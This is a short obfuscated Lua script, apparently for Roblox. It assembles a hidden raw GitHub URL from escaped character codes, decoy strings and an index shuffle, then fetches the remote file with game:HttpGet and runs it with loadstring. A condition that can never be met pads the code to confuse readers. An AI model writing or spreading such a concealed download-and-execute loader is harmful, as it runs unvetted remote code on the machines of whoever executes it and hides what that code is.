return(function(...)
local R={
"\070\061\061","\119\090\077\065","\104\116\116\112\115\058\047\047",
"\073\055\051\099","\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047",
"\055\072\086\083","\108\097\114\052\055\053\053\052\054\054\045\098\105\116\047",
"\074\065\089\083\073\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047",
"\099\053\075\081","\074\065\089\083\073\046\076\117\110","\043\090\067\112"
}
for i=1,#R*5 do
local a=(i*13)%#R+1
local b=(i*31)%#R+1
R[a],R[b]=R[b],R[a]
end
local function D(s)
return s:gsub("\\(%d%d?%d?)",function(n)
return string.char((tonumber(n)+512)%256)
end)
end
local M={3,5,7,9,11,8,6,4}
local U=""
for _,i in ipairs(M)do
U=U..D(R[i])
end
local function X()
local t=0
for i=1,40 do
t=(t+math.floor(math.cos(i)*10000))%999999
end
return t
end
if X()==-123 then return end
return loadstring(game:HttpGet(U))(...)
end)(...)
